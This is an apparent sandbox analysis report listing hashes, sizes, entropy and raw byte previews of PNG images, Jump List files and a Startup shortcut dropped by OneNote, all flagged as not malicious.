MD5:	3A5CD52E925A7C4A345047D8F06C3C41
SHA1:	9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
SHA-256:	477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
SHA-512:	8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..\|.....+)..H..C.K... ....x).rU..T..E...;.....@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z.GJ...."@zJ}...." ...Si8RD.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[\|\|...t.T.w .. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...

C:\Users\user\AppData\Local\Temp\{E8FEFDC6-DAEF-4F26-A0AD-F8F9C5F6B959}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{EA4816F8-773A-4C1C-B911-44B8622380D5}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1924
Entropy (8bit):	7.836744258175623
Encrypted:	false
SSDEEP:	24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
MD5:	B1FDE66F75507567B5F0C6C07B01A3A1
SHA1:	80B8E6A923E853232F66C874367E90B5C9CAD7AE
SHA-256:	B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
SHA-512:	FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
Malicious:	false
Preview:	.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M..J.....".4....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o\|.?.......;C\|.#.../v.H.......o~.{G......H.\|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P\|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O\|.D...

C:\Users\user\AppData\Local\Temp\{ECE96D75-278F-4D3E-BCAC-DF9E4619CF4D}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{EF7D3DED-BFBC-4A3F-A761-03F824D94F67}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4847
Entropy (8bit):	7.950192613458318
Encrypted:	false
SSDEEP:	96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
MD5:	A1A1017A6A7928761CEB56D1D950E123
SHA1:	28272E9C7F816A1CE8F2033FC00F489005332365
SHA-256:	72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
SHA-512:	10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
Malicious:	false
Preview:	.PNG........IHDR.............n.<.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].\TU..}...E.0.T....L~....af..Z.....O..4..>Ms..Js_....5.E.d...Y....?\z.3..}.l..\|?~...{.....s.z..Y.............E.X.6...c..u...y..W.j....."}...l.i.`.!-!-......MKH.E.bi.d...b.X.)...X4 .vJ6-...;..+/.->Qyi.t...%.T..k;.U..y.C$[;..Gm.......v..*2..2..eee..."!..)...yy...III./..u........2....M.:''...W.....o..t...._.6m.... .`,k.T.v."..q.......s~~........O....ed.[W0X..HB.V.i.....<=..E^^......MyY..vpp...........^6.....aQQQaaa........]^^nkg../_.d`.%......L&k..B......?C....W.VVV6660t.J+K.:..%q.....e.cp....Kz..%.qZsAR\T.!......>55.R.u.W\\.L....T...K..rE.U.K.-9......y.y.......K....>...HWTT.e....+..B.......%%%......^...\|...M'.%.f!/..=p...{O..../...@...DP..hw8....7o>..A.mgg......7-']~.s.OE.E.\|=.......'%!y.......\.....MSn.i.........!...U.$0S .......Z.P.}[.%X[.;{....N.....\......6O.....'.N}.}s.m...E..V..f..r...4..~.......H..F.}....4,.R.=.......xT..4......./...,z

C:\Users\user\AppData\Local\Temp\{F1D88171-A0BB-4A93-93C9-737542F67D6E}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11332
Entropy (8bit):	7.9324721568775285
Encrypted:	false
SSDEEP:	192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
MD5:	31579CA3352DF8FA4E3E7F48C7CDF672
SHA1:	AA682A3C781BF8EE43B5EDC9718E64CB79135F25
SHA-256:	B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
SHA-512:	782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b. &M.d-e... ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...\|....7...b...\|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..\|..[..g%(h.....W...?...UDh..T$..?....\|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,\|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?\|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.

C:\Users\user\AppData\Local\Temp\{F44A893A-BFE2-4720-AD24-9A09717ED95F}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	7.837610270261933
Encrypted:	false
SSDEEP:	48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
MD5:	EDB5ED43CC6038500A54B90BEC493628
SHA1:	A8CD63F3914E4347F4C5552FB922C6C03917F45F
SHA-256:	9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
SHA-512:	4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
Malicious:	false
Preview:	.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...........A..!.A.....R.Ai%YH..(M.".h.cf.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8...X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o\|%..7..'.....N.\|..Vi...q..uO,`/....\W{..y...&iI..\|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.\|....8..H......_...G...\|......;6YQ\|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

C:\Users\user\AppData\Local\Temp\{F56F84CA-2C76-41CD-8192-8471A7E2BFF9}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2332
Entropy (8bit):	7.8822150338370776
Encrypted:	false
SSDEEP:	48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
MD5:	91CB7F1273AA003076401081B8A22237
SHA1:	5157144069E7D2FDAE60B397BE5851E75BDF7707
SHA-256:	80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
SHA-512:	5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
Malicious:	false
Preview:	.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r\|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..\|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

C:\Users\user\AppData\Local\Temp\{F7B43362-9092-4F26-ACA9-1770C5F42163}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Local\Temp\{F88731CF-EF60-4B94-9340-6A60A7BAA8ED}.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Temp\{FB231253-DC6B-4F19-8C55-1F2DDA3D2C7B}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Temp\{FCB30741-EDC9-4DE7-AD55-389C23C0AB15}

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1604
Entropy (8bit):	7.814570704154439
Encrypted:	false
SSDEEP:	48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
MD5:	3F1535054D4F9626F0EB10CEE47F076E
SHA1:	92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
SHA-256:	4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
SHA-512:	2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
Malicious:	false
Preview:	.PNG........IHDR.......1.....[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....\|.O\|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH\|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.WR.c....I1.......<y.%...-..."Y@....)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\36a44befa49650d0.customDestinations-ms (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.494450148648714
Encrypted:	false
SSDEEP:	48:Y8yudO75CIFObqzqgdCDDGTCDBdRyudO75Ch7+1qqGqzWk7dCDGWG5CDVgH:wFlqfGOCCALZhO4
MD5:	749A46D26A5E3A98AA8C949385634E4B
SHA1:	24126EC0D794D479EC60187AF1A7BC3C795CCBCD
SHA-256:	94958B997544EE9FEA24A6223EEE4AA8D9C3F225416A67A2787AC6E6F22C382A
SHA-512:	72C4E7296D9DF2F86D14C4E3C9B0BE604AF7AA3FDB879D14DE322FBC7B1B8E5039409F80CEFAAD40F938C31735526ABC46B04B2DA289F4BD1A2077B2ADB12387
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{....~i..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qV.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qV......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qV......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XYAJLSH8PLEKE5H7IOSS.temp

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	3873
Entropy (8bit):	3.494450148648714
Encrypted:	false
SSDEEP:	48:Y8yudO75CIFObqzqgdCDDGTCDBdRyudO75Ch7+1qqGqzWk7dCDGWG5CDVgH:wFlqfGOCCALZhO4
MD5:	749A46D26A5E3A98AA8C949385634E4B
SHA1:	24126EC0D794D479EC60187AF1A7BC3C795CCBCD
SHA-256:	94958B997544EE9FEA24A6223EEE4AA8D9C3F225416A67A2787AC6E6F22C382A
SHA-512:	72C4E7296D9DF2F86D14C4E3C9B0BE604AF7AA3FDB879D14DE322FBC7B1B8E5039409F80CEFAAD40F938C31735526ABC46B04B2DA289F4BD1A2077B2ADB12387
Malicious:	false
Preview:	...................................FL..................F.@.. .....Q{....~i..X....Q{...(............................P.O. .:i.....+00.../C:\.....................1......U....PROGRA~2.........L.qV.....................V.........P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....j.1......P...MICROS~1..R.......Py.qV......].....................M..M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.....Z.1......P4...Office16..B.......Py.qV......].....................u..O.f.f.i.c.e.1.6.....b.2.(...qP.. .ONENOTE.EXE.H......qP..qV...............................O.N.E.N.O.T.E...E.X.E.......k...............-.......j...........>.S......C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE....(.W.i.n.d.o.w.s. .+. .N.).../.s.i.d.e.n.o.t.e.<.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.\.O.f.f.i.c.e.1.6.\.O.N.E.N.O.T.E...E.X.E.........%ProgramFiles%\Microsoft Office\Office16\ONENOTE.EXE........................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Send to OneNote.lnk

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Has command line arguments, Archive, ctime=Tue Jun 30 15:57:16 2015, mtime=Fri Mar 17 15:24:17 2023, atime=Tue Jun 30 15:57:16 2015, length=157872, window=hide
Category:	dropped
Size (bytes):	1251
Entropy (8bit):	4.672400310095903
Encrypted:	false
SSDEEP:	24:8t5o2yudOE+KsFhCh7+ZpAyNqzWFUTdCDhxYUUmw7aB6m:8tlyudO75Ch7+ZqGqzWFwdCDt/B6
